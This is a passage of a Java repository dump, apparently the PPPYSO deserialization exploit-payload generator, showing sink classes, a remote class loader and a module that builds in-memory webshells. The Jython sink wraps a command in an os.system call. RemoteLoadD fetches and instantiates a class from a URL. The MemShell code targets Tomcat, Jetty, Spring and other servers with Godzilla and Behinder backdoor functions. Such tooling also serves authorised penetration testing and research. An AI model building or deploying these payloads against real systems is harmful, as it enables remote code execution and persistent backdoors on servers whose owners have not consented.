12 | * 默认 无返回值 13 | */ 14 | @Sink({Sink.Default}) 15 | public class Default { 16 | @EnchantType({EnchantType.DEFAULT}) 17 | public String defaultCommand(SinksHelper sinksHelper) { 18 | String command = sinksHelper.getCommand(); 19 | Printer.yellowInfo("command: " + command); 20 | 21 | return command; 22 | } 23 | 24 | 25 | /** 26 | * 文件写入 27 | * 28 | * @param sinksHelper 29 | * @return 30 | * @throws Exception 31 | */ 32 | @EnchantType({EnchantType.FileWrite}) 33 | public byte[] fileWrite(SinksHelper sinksHelper) throws Exception { 34 | String serverFilePath = sinksHelper.getServerFilePath(); 35 | String localFilePath = sinksHelper.getLocalFilePath(); 36 | String fileContent = sinksHelper.getFileContent(); 37 | Printer.yellowInfo("Server file path: " + serverFilePath); 38 | 39 | byte[] contentBytes = new byte[]{}; 40 | 41 | if (localFilePath != null) { 42 | Printer.yellowInfo("Local file path: " + localFilePath); 43 | try { 44 | FileInputStream fileInputStream = new FileInputStream(localFilePath); 45 | contentBytes = new byte[fileInputStream.available()]; 46 | fileInputStream.read(contentBytes); 47 | fileInputStream.close(); 48 | } catch (Exception e) { 49 | Printer.error("File read error"); 50 | } 51 | } else if (fileContent != null) { 52 | contentBytes = fileContent.getBytes(); 53 | } 54 | 55 | return contentBytes; 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/EL.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks; 2 | 3 | import com.ppp.Printer; 4 | import com.ppp.sinks.annotation.EnchantType; 5 | import com.ppp.sinks.annotation.Sink; 6 | 7 | /** 8 | * @author Whoopsunix 9 | *

10 | * EL Expression 11 | * MyFaces 没复现出来 12 | */ 13 | @Sink({Sink.EL}) 14 | public class EL { 15 | @EnchantType({EnchantType.DEFAULT}) 16 | public String defaultEL(SinksHelper sinksHelper) { 17 | String command = sinksHelper.getCommand(); 18 | 19 | Printer.yellowInfo("el: " + sinksHelper.getCommand()); 20 | 21 | return command; 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/JNDI.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks; 2 | 3 | import com.ppp.Printer; 4 | import com.ppp.sinks.annotation.EnchantType; 5 | import com.ppp.sinks.annotation.Sink; 6 | 7 | /** 8 | * @author Whoopsunix 9 | */ 10 | @Sink({Sink.JNDI}) 11 | public class JNDI { 12 | @EnchantType({EnchantType.DEFAULT}) 13 | public String defaultJNDI(SinksHelper sinksHelper) { 14 | String command = sinksHelper.getCommand(); 15 | Printer.yellowInfo("jndi url: " + command); 16 | 17 | return command; 18 | } 19 | 20 | @EnchantType({EnchantType.JRMP}) 21 | public void defaultJRMP(SinksHelper sinksHelper) { 22 | String host = sinksHelper.getHost(); 23 | Integer port = sinksHelper.getPort(); 24 | 25 | Printer.yellowInfo("host: " + host); 26 | Printer.yellowInfo("port: " + port); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/Jython.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks; 2 | 3 | import com.ppp.Printer; 4 | import com.ppp.sinks.annotation.EnchantType; 5 | import com.ppp.sinks.annotation.Sink; 6 | 7 | /** 8 | * @author Whoopsunix 9 | */ 10 | @Sink({Sink.Jython}) 11 | public class Jython { 12 | @EnchantType({EnchantType.DEFAULT}) 13 | public String defaultPythonCode(SinksHelper sinksHelper) { 14 | String command = sinksHelper.getCommand(); 15 | Printer.yellowInfo("command: " + command); 16 | String result = String.format("__import__('os').system('%s')", command); 17 | Printer.blueInfo("Python code: " + result); 18 | 19 | return result; 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/annotation/EnchantEnums.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | /** 6 | * @author Whoopsunix 7 | *

8 | * 可选固定值参数 9 | */ 10 | public enum EnchantEnums { 11 | Default, 12 | // 操作系统 13 | WIN, 14 | // 本地字节码加载 15 | RHINO, 16 | // 延时 17 | Timeunit, 18 | // 二次反序列化 19 | SignedObject, 20 | RMIConnector, 21 | 22 | /** 23 | * 命令执行 24 | */ 25 | Runtime, 26 | ProcessBuilder, 27 | ScriptEngine, 28 | SnakeYAML, 29 | ; 30 | 31 | public static EnchantEnums getEnchantEnums(String enchantEnums) { 32 | for (EnchantEnums value : values()) { 33 | if (value.name().equalsIgnoreCase(enchantEnums)) { 34 | return value; 35 | } 36 | } 37 | Printer.warn(String.format("No such enchantEnums: %s , use Default", enchantEnums)); 38 | return Default; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/annotation/EnchantType.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks.annotation; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | import java.lang.reflect.AnnotatedElement; 8 | 9 | /** 10 | * 功能增强类型 11 | */ 12 | @Target({ElementType.METHOD, ElementType.TYPE}) 13 | @Retention(RetentionPolicy.RUNTIME) 14 | public @interface EnchantType { 15 | /** 16 | * 功能清单 17 | */ 18 | // 默认功能 19 | String DEFAULT = "Default"; 20 | // 命令执行 21 | String Command = "Command"; 22 | // 线程延时 23 | String Delay = "Delay"; 24 | // Socket 探测 25 | String Socket = "Socket"; 26 | // 文件写入 27 | String FileWrite = "FileWrite"; 28 | // 远程类加载 29 | String RemoteLoad = "RemoteLoad"; 30 | // JavaClass 31 | String JavaClass = "JavaClass"; 32 | String JRMP = "JRMP"; 33 | 34 | String[] value() default {}; 35 | 36 | public static class Utils { 37 | public static String[] getAuthors(AnnotatedElement annotated) { 38 | EnchantType enchantType = annotated.getAnnotation(EnchantType.class); 39 | if (enchantType != null && enchantType.value() != null) { 40 | return enchantType.value(); 41 | } else { 42 | return new String[0]; 43 | } 44 | } 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/annotation/GadgetDependency.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks.annotation; 2 | 3 | /** 4 | * @author Whoopsunix 5 | */ 6 | public enum GadgetDependency { 7 | Default, 8 | 9 | Rome, 10 | RomeTools, 11 | ; 12 | 13 | public static GadgetDependency getGadgetDependency(String name) { 14 | for (GadgetDependency dependency : GadgetDependency.values()) { 15 | if (dependency.name().equalsIgnoreCase(name)) { 16 | return dependency; 17 | } 18 | } 19 | return Default; 20 | } 21 | 22 | } 23 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/sinks/annotation/Sink.java: -------------------------------------------------------------------------------- 1 | package com.ppp.sinks.annotation; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | 8 | /** 9 | * @author Whoopsunix 10 | *

11 | * 标记 gadget ,便于后续统一处理 12 | * 这个标记会涉及调用链的变动,与 Sink 增强有本质区别 13 | */ 14 | @Target(ElementType.TYPE) 15 | @Retention(RetentionPolicy.RUNTIME) 16 | public @interface Sink { 17 | String Default = "Default"; 18 | String InvokerTransformer3 = "InvokerTransformer3"; 19 | String InvokerTransformer4 = "InvokerTransformer4"; 20 | String TemplatesImpl = "TemplatesImpl"; 21 | String JNDI = "JNDI"; 22 | String Jython = "Jython"; 23 | String C3P0 = "C3P0"; 24 | String EL = "EL"; 25 | String URLDNS = "URLDNS"; 26 | String WrapSerialization = "WrapSerialization"; 27 | 28 | String[] value() default {}; 29 | 30 | // public static class Utils { 31 | // public static String[] getGadgetTypes(AnnotatedElement annotated) { 32 | // SinkType gadgetTypes = annotated.getAnnotation(SinkType.class); 33 | // if (gadgetTypes != null && gadgetTypes.value() != null) { 34 | // return gadgetTypes.value(); 35 | // } else { 36 | // return new String[0]; 37 | // } 38 | // } 39 | // } 40 | } 41 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/utils/CommandUtils.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.util.Arrays; 6 | 7 | /** 8 | * @author Whoopsunix 9 | */ 10 | public class CommandUtils { 11 | 12 | /** 13 | * 转化为 "" 包裹 14 | * @param command 15 | * @return 16 | */ 17 | public static String splitCommandComma(String command) { 18 | String[] strings = splitCommand(command); 19 | 20 | StringBuilder resultBuilder = new StringBuilder(); 21 | for (int i = 0; i < strings.length; i++) { 22 | if (i < strings.length - 1) 23 | resultBuilder.append("'").append(strings[i]).append("'").append(","); 24 | else 25 | resultBuilder.append("'").append(strings[i]).append("'"); 26 | } 27 | return resultBuilder.toString(); 28 | 29 | } 30 | 31 | /** 32 | * 将命令按空格分为三段用于 new String[] 33 | * @param command 34 | * @return 35 | */ 36 | public static String[] splitCommand(String command) { 37 | // 使用 String.split() 方法将字符串按空格划分 38 | String[] parts = command.split("\\s+"); 39 | 40 | StringBuilder resultBuilder = new StringBuilder(); 41 | for (int i = 0; i < parts.length; i++) { 42 | if (i < 2) continue; 43 | if (i < parts.length - 1) 44 | resultBuilder.append(parts[i]).append(" "); 45 | else 46 | resultBuilder.append(parts[i]); 47 | } 48 | 49 | if (parts.length >=3){ 50 | String[] result = new String[3]; 51 | result[0] = parts[0]; 52 | result[1] = parts[1]; 53 | result[2] = resultBuilder.toString(); 54 | Printer.blueInfo("Split command: " + Arrays.toString(result)); 55 | return result; 56 | } else { 57 | Printer.blueInfo("Split command: " + Arrays.toString(parts)); 58 | return parts; 59 | } 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /gadgets/src/main/java/com/ppp/utils/RemoteLoadD.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils; 2 | 3 | /** 4 | * @author Whoopsunix 5 | */ 6 | public class RemoteLoadD { 7 | private static String url; 8 | 9 | private static String className; 10 | 11 | private static Object param; 12 | 13 | static { 14 | try { 15 | java.net.URL u = new java.net.URL(url); 16 | java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{u}); 17 | Class loadedClass = classLoader.loadClass(className); 18 | java.lang.reflect.Constructor constructor = loadedClass.getDeclaredConstructor(param.getClass()); 19 | constructor.setAccessible(true); 20 | Object object = constructor.newInstance(param); 21 | }catch (Exception e){ 22 | e.printStackTrace(); 23 | } 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /javaClassBuilder/pom.xml: -------------------------------------------------------------------------------- 1 | 3 | 4.0.0 4 | 5 | com.ppp 6 | javaClassBuilder 7 | 1.2.0 8 | jar 9 | 10 | javaClassBuilder 11 | Whoopsunix 12 | 13 | 14 | UTF-8 15 | 16 | 17 | 18 | 19 | com.ppp 20 | common 21 | 1.0 22 | 23 | 24 | 25 | 26 | PPPYSO-javaClassBuilder 27 | 28 | 29 | org.apache.maven.plugins 30 | maven-compiler-plugin 31 | 32 | 7 33 | 7 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/JavaClassBuilder.java: -------------------------------------------------------------------------------- 1 | package com.ppp; 2 | 3 | import com.ppp.annotation.JavaClassHelperType; 4 | import com.ppp.annotation.JavaClassMakerEnhance; 5 | import com.ppp.utils.Reflections; 6 | import com.ppp.utils.maker.ClassUtils; 7 | import com.ppp.utils.maker.CryptoUtils; 8 | 9 | import java.io.FileInputStream; 10 | import java.util.Arrays; 11 | import java.util.List; 12 | 13 | /** 14 | * @author Whoopsunix 15 | * 内存马生成 16 | */ 17 | 18 | public class JavaClassBuilder { 19 | private static String schedulerPackageName = "com.ppp.scheduler"; 20 | 21 | public static byte[] build(JavaClassHelper javaClassHelper) throws Exception { 22 | String javaClassHelperType = javaClassHelper.getJavaClassHelperType(); 23 | String javaClassFilePath = javaClassHelper.getJavaClassFilePath(); 24 | 25 | JavaClassAdvanceBuilder.builder(javaClassHelper); 26 | 27 | byte[] bytes = new byte[0]; 28 | if (javaClassHelperType.equals(JavaClassHelperType.Custom)) { 29 | try { 30 | Printer.yellowInfo("load JavaClass from file: " + javaClassFilePath); 31 | FileInputStream fileInputStream = new FileInputStream(javaClassFilePath); 32 | bytes = new byte[fileInputStream.available()]; 33 | fileInputStream.read(bytes); 34 | fileInputStream.close(); 35 | Printer.yellowInfo("Custom JavaClass: " + new String(bytes)); 36 | byte[] expectedPrefix = {121, 118, 54, 54}; 37 | if (Arrays.equals(Arrays.copyOfRange(bytes, 0, expectedPrefix.length), expectedPrefix)) { 38 | bytes = CryptoUtils.base64decoder(new String(bytes)); 39 | } 40 | 41 | } catch (Exception e) { 42 | Printer.error("File read error"); 43 | } 44 | } else { 45 | Class builderClass = null; 46 | List> schedulerClasses = ClassUtils.getClasses(schedulerPackageName); 47 | for (Class clazz : schedulerClasses) { 48 | JavaClassHelperType javaClassHelperTypeAnnotation = clazz.getAnnotation(JavaClassHelperType.class); 49 | if (javaClassHelperTypeAnnotation == null) continue; 50 | 51 | if (javaClassHelperTypeAnnotation.value().equals(javaClassHelperType)) { 52 | builderClass = clazz; 53 | break; 54 | } 55 | } 56 | 57 | bytes = (byte[]) Reflections.invokeMethod(builderClass.newInstance(), "build", javaClassHelper); 58 | } 59 | 60 | /** 61 | * 输出增强 62 | */ 63 | JavaClassAdvanceBuilder.result(javaClassHelper, bytes); 64 | return bytes; 65 | } 66 | 67 | } 68 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/Builder.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | 8 | /** 9 | * Java Class Loader 类型 10 | */ 11 | @Target({ElementType.METHOD, ElementType.TYPE}) 12 | @Retention(RetentionPolicy.RUNTIME) 13 | public @interface Builder { 14 | String Loader = "Loader"; 15 | String MS = "MS"; 16 | String RceEcho = "RceEcho"; 17 | 18 | String value(); 19 | } 20 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassEnhance.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | /** 6 | * @author Whoopsunix 7 | * JavaClass 输出增强 8 | */ 9 | public enum JavaClassEnhance { 10 | /** 11 | * 输出 12 | */ 13 | Default("default"), 14 | Script("Script"), 15 | SPEL("SPEL"), 16 | SPELLoadClass("SPEL LoadClass"), 17 | FreeMarker("FreeMarker"), 18 | ; 19 | private final String info; 20 | 21 | JavaClassEnhance(String info) { 22 | this.info = info; 23 | } 24 | 25 | public String getInfo() { 26 | return info; 27 | } 28 | 29 | public static JavaClassEnhance[] splitJavaClassEnhance(String enchant) { 30 | String[] split = enchant.split(","); 31 | JavaClassEnhance[] javaClassEnhances = new JavaClassEnhance[split.length]; 32 | for (int i = 0; i < split.length; i++) { 33 | javaClassEnhances[i] = getJavaClassEnhanceEnums(split[i]); 34 | } 35 | return javaClassEnhances; 36 | } 37 | 38 | public static JavaClassEnhance getJavaClassEnhanceEnums(String enchantEnums) { 39 | for (JavaClassEnhance value : values()) { 40 | if (value.name().equalsIgnoreCase(enchantEnums)) { 41 | return value; 42 | } 43 | } 44 | if (enchantEnums != null) 45 | Printer.warn(String.format("No such JavaClassEnhance: %s , use Default", enchantEnums)); 46 | return Default; 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassHelperType.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | 10 | /** 11 | * JavaClass 类型 12 | */ 13 | @Target({ElementType.METHOD, ElementType.TYPE}) 14 | @Retention(RetentionPolicy.RUNTIME) 15 | public @interface JavaClassHelperType { 16 | String MemShell = "MemShell"; 17 | String RceEcho = "RceEcho"; 18 | // 自定义 19 | String Custom = "Custom"; 20 | 21 | String value(); 22 | 23 | public static class Utils { 24 | public static String getJavaClassHelperType(String javaClassHelperType) { 25 | if (javaClassHelperType != null && javaClassHelperType.equalsIgnoreCase(JavaClassHelperType.MemShell)) { 26 | return JavaClassHelperType.MemShell; 27 | } else if (javaClassHelperType != null && javaClassHelperType.equalsIgnoreCase(JavaClassHelperType.RceEcho)) { 28 | return JavaClassHelperType.RceEcho; 29 | } else if (javaClassHelperType != null && javaClassHelperType.equalsIgnoreCase(JavaClassHelperType.Custom)) { 30 | return JavaClassHelperType.Custom; 31 | } else { 32 | Printer.error(String.format("JavaClassHelperType not found: %s", javaClassHelperType)); 33 | return null; 34 | } 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassMakerEnhance.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | /** 6 | * @author Whoopsunix 7 | * JavaClass 创建增强 8 | */ 9 | public enum JavaClassMakerEnhance { 10 | /** 11 | * 输出 12 | */ 13 | Default("default"), 14 | JDK17("JDK17") 15 | ; 16 | private final String info; 17 | 18 | JavaClassMakerEnhance(String info) { 19 | this.info = info; 20 | } 21 | 22 | public String getInfo() { 23 | return info; 24 | } 25 | 26 | public static JavaClassMakerEnhance[] splitJavaClassMakerEnhance(String enchant) { 27 | String[] split = enchant.split(","); 28 | JavaClassMakerEnhance[] javaClassEnhances = new JavaClassMakerEnhance[split.length]; 29 | for (int i = 0; i < split.length; i++) { 30 | javaClassEnhances[i] = getJavaClassMakerEnhanceEnums(split[i]); 31 | } 32 | return javaClassEnhances; 33 | } 34 | 35 | public static JavaClassMakerEnhance getJavaClassMakerEnhanceEnums(String enchantEnums) { 36 | for (JavaClassMakerEnhance value : values()) { 37 | if (value.name().equalsIgnoreCase(enchantEnums)) { 38 | return value; 39 | } 40 | } 41 | if (enchantEnums != null) 42 | Printer.warn(String.format("No such JavaClassMakerEnhance: %s , use Default", enchantEnums)); 43 | return Default; 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassModifiable.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | 8 | /** 9 | * JavaClass 自定义信息 10 | */ 11 | @Target({ElementType.METHOD, ElementType.TYPE}) 12 | @Retention(RetentionPolicy.RUNTIME) 13 | public @interface JavaClassModifiable { 14 | // 类名 15 | String CLASSNAME = "CLASSNAME"; 16 | // 内存马名称 17 | String NAME = "NAME"; 18 | // 请求头 key 19 | String HEADER = "HEADER"; 20 | // 响应头 key 21 | String RHEADER = "RHEADER"; 22 | // 参数 key 23 | String PARAM = "PARAM"; 24 | // 路径 25 | String PATH = "PATH"; 26 | 27 | // Godzilla 28 | String key = "key"; 29 | String pass = "pass"; 30 | String lockHeaderKey = "lockHeaderKey"; 31 | String lockHeaderValue = "lockHeaderValue"; 32 | 33 | String[] value() default {}; 34 | } 35 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/JavaClassType.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | 10 | /** 11 | * 生成类型 12 | */ 13 | @Target({ElementType.METHOD, ElementType.TYPE}) 14 | @Retention(RetentionPolicy.RUNTIME) 15 | public @interface JavaClassType { 16 | String Default = "Default"; 17 | /** 18 | * Loader 19 | */ 20 | String AutoFind = "AutoFind"; 21 | 22 | String value(); 23 | 24 | public static class Utils { 25 | // public static String[] splitJavaClassType(String javaClassType) { 26 | // if (javaClassType == null) { 27 | // return new String[]{JavaClassType.Default}; 28 | // } 29 | // String[] split = javaClassType.split(","); 30 | // String[] javaClassTypes = new String[split.length]; 31 | // for (int i = 0; i < split.length; i++) { 32 | // javaClassTypes[i] = getJavaClassType(split[i]); 33 | // } 34 | // return javaClassTypes; 35 | // } 36 | 37 | public static String getJavaClassType(String javaClassType) { 38 | if (javaClassType != null && javaClassType.equalsIgnoreCase(JavaClassType.AutoFind)) { 39 | return JavaClassType.AutoFind; 40 | } else { 41 | Printer.blueInfo("JavaClassType not found use Default"); 42 | return JavaClassType.Default; 43 | } 44 | } 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/MemShell.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | import java.lang.reflect.Field; 10 | import java.util.ArrayList; 11 | import java.util.List; 12 | 13 | /** 14 | * 内存马类型 15 | */ 16 | @Target({ElementType.METHOD, ElementType.TYPE}) 17 | @Retention(RetentionPolicy.RUNTIME) 18 | public @interface MemShell { 19 | String Listener = "Listener"; 20 | String Servlet = "Servlet"; 21 | String Filter = "Filter"; 22 | String Executor = "Executor"; 23 | String Controller = "Controller"; 24 | String Valve = "Valve"; 25 | String Interceptor = "Interceptor"; 26 | 27 | String value(); 28 | // String[] value() default {}; 29 | 30 | public static class Utils { 31 | public static List show() { 32 | ArrayList result = new ArrayList(); 33 | Field[] declaredFields = MemShell.class.getDeclaredFields(); 34 | for (Field declaredField : declaredFields) { 35 | try { 36 | result.add(declaredField.get(null)); 37 | } catch (IllegalAccessException e) { 38 | 39 | } 40 | } 41 | return result; 42 | } 43 | 44 | public static String getMemShell(String ms) { 45 | if (ms != null && ms.equalsIgnoreCase(MemShell.Listener)) { 46 | return MemShell.Listener; 47 | } else if (ms != null && ms.equalsIgnoreCase(MemShell.Servlet)) { 48 | return MemShell.Servlet; 49 | } else if (ms != null && ms.equalsIgnoreCase(MemShell.Filter)) { 50 | return MemShell.Filter; 51 | } else if (ms != null && ms.equalsIgnoreCase(MemShell.Controller)) { 52 | return MemShell.Controller; 53 | } else if (ms != null && ms.equalsIgnoreCase(MemShell.Valve)) { 54 | return MemShell.Valve; 55 | } else if (ms != null && ms.equalsIgnoreCase(MemShell.Executor)) { 56 | return MemShell.Executor; 57 | } else if (ms != null && ms.equalsIgnoreCase(MemShell.Interceptor)) { 58 | return MemShell.Interceptor; 59 | } else { 60 | Printer.warn(String.format("MemShell not found: %s", ms)); 61 | return null; 62 | } 63 | } 64 | } 65 | 66 | 67 | } 68 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/MemShellFunction.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | import java.lang.reflect.Field; 10 | import java.util.ArrayList; 11 | import java.util.List; 12 | 13 | /** 14 | * 内存马功能 15 | */ 16 | @Target({ElementType.METHOD, ElementType.TYPE}) 17 | @Retention(RetentionPolicy.RUNTIME) 18 | public @interface MemShellFunction { 19 | String Exec = "Exec"; 20 | String Godzilla = "Godzilla"; 21 | String Behinder = "Behinder"; 22 | String sou5 = "sou5"; 23 | 24 | String value(); 25 | 26 | public static class Utils { 27 | public static List show() { 28 | ArrayList result = new ArrayList(); 29 | Field[] declaredFields = MemShellFunction.class.getDeclaredFields(); 30 | for (Field declaredField : declaredFields) { 31 | try { 32 | result.add(declaredField.get(null)); 33 | } catch (IllegalAccessException e) { 34 | 35 | } 36 | } 37 | return result; 38 | } 39 | 40 | public static String getMemShellFunction(String msf) { 41 | if (msf != null && msf.equalsIgnoreCase(MemShellFunction.Exec)) { 42 | return MemShellFunction.Exec; 43 | } else if (msf != null && msf.equalsIgnoreCase(MemShellFunction.Godzilla)) { 44 | return MemShellFunction.Godzilla; 45 | } else if (msf != null && msf.equalsIgnoreCase(MemShellFunction.Behinder)) { 46 | return MemShellFunction.Behinder; 47 | } else if (msf != null && msf.equalsIgnoreCase(MemShellFunction.sou5)) { 48 | return MemShellFunction.sou5; 49 | } else { 50 | Printer.warn(String.format("MemShellFunction not found: %s", msf)); 51 | return null; 52 | } 53 | } 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/MemShellType.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | 10 | /** 11 | * 生成类型 12 | */ 13 | @Target({ElementType.METHOD, ElementType.TYPE}) 14 | @Retention(RetentionPolicy.RUNTIME) 15 | public @interface MemShellType { 16 | String Default = "Default"; 17 | /** 18 | * MS 19 | */ 20 | String Raw = "Raw"; 21 | 22 | String value(); 23 | 24 | public static class Utils { 25 | // public static String[] splitJavaClassType(String javaClassType) { 26 | // if (javaClassType == null) { 27 | // return new String[]{JavaClassType.Default}; 28 | // } 29 | // String[] split = javaClassType.split(","); 30 | // String[] javaClassTypes = new String[split.length]; 31 | // for (int i = 0; i < split.length; i++) { 32 | // javaClassTypes[i] = getJavaClassType(split[i]); 33 | // } 34 | // return javaClassTypes; 35 | // } 36 | 37 | public static String getJavaClassType(String javaClassType) { 38 | if (javaClassType != null && javaClassType.equalsIgnoreCase(MemShellType.Raw)) { 39 | return MemShellType.Raw; 40 | } else { 41 | Printer.blueInfo("MemShellType not found use Default"); 42 | return MemShellType.Default; 43 | } 44 | } 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/annotation/Middleware.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import com.ppp.Printer; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | 10 | /** 11 | * 中间件 12 | */ 13 | @Target({ElementType.METHOD, ElementType.TYPE}) 14 | @Retention(RetentionPolicy.RUNTIME) 15 | public @interface Middleware { 16 | // 中间件 17 | String Tomcat = "Tomcat"; 18 | String Jetty = "Jetty"; 19 | String Spring = "Spring"; 20 | String Undertow = "Undertow"; 21 | String Resin = "Resin"; 22 | 23 | String value(); 24 | 25 | public static class Utils { 26 | public static String getMiddleware(String middleware) { 27 | if (middleware != null && middleware.equalsIgnoreCase(Middleware.Tomcat)) { 28 | return Middleware.Tomcat; 29 | } else if (middleware != null && middleware.equalsIgnoreCase(Middleware.Jetty)) { 30 | return Middleware.Jetty; 31 | } else if (middleware != null && middleware.equalsIgnoreCase(Middleware.Spring)) { 32 | return Middleware.Spring; 33 | } else if (middleware != null && middleware.equalsIgnoreCase(Middleware.Undertow)) { 34 | return Middleware.Undertow; 35 | } else if (middleware != null && middleware.equalsIgnoreCase(Middleware.Resin)) { 36 | return Middleware.Resin; 37 | } else { 38 | Printer.error(String.format("Middleware not found: %s", middleware)); 39 | return null; 40 | } 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /javaClassBuilder/src/main/java/com/ppp/middleware/builder/RceEchoBuilder.java: -------------------------------------------------------------------------------- 1 | package com.ppp.middleware.builder; 2 | 3 | import com.ppp.JavaClassHelper; 4 | import com.ppp.annotation.Builder; 5 | import javassist.ClassClassPath; 6 | import javassist.ClassPool; 7 | import javassist.CtClass; 8 | 9 | /** 10 | * @author Whoopsunix 11 | */ 12 | @Builder(Builder.RceEcho) 13 | public class RceEchoBuilder { 14 | public byte[] build(Class cls, JavaClassHelper javaClassHelper) throws Exception { 15 | ClassPool classPool = ClassPool.getDefault(); 16 | classPool.insertClassPath(new ClassClassPath(cls)); 17 | // classPool.importPackage("javax.servlet.http"); 18 | classPool.importPackage("java.util"); 19 | classPool.importPackage("java.lang.reflect"); 20 | 21 | CtClass ctClass = classPool.getCtClass(cls.getName()); 22 | 23 | JavaClassModifier.javaClassHelperInit(javaClassHelper); 24 | 25 | JavaClassModifier.ctClassBuilderNew(cls, ctClass, javaClassHelper); 26 | 27 | return JavaClassModifier.toBytes(ctClass); 28 | 29 | 30 | // // 字段信息修改 31 | // JavaClassModifier.fieldChange(cls, ctClass, javaClassHelper); 32 | // 33 | // return JavaClassModifier.ctClassBuilderExt(ctClass, javaClassHelper); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /libs/coherence-rest.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/libs/coherence-rest.jar -------------------------------------------------------------------------------- /libs/coherence-web.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/libs/coherence-web.jar -------------------------------------------------------------------------------- /libs/coherence.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/libs/coherence.jar -------------------------------------------------------------------------------- /scheduler/pom.xml: -------------------------------------------------------------------------------- 1 | 3 | 4.0.0 4 | 5 | com.ppp 6 | scheduler 7 | 1.2.2 8 | jar 9 | 10 | scheduler 11 | Whoopsunix 12 | 13 | 14 | UTF-8 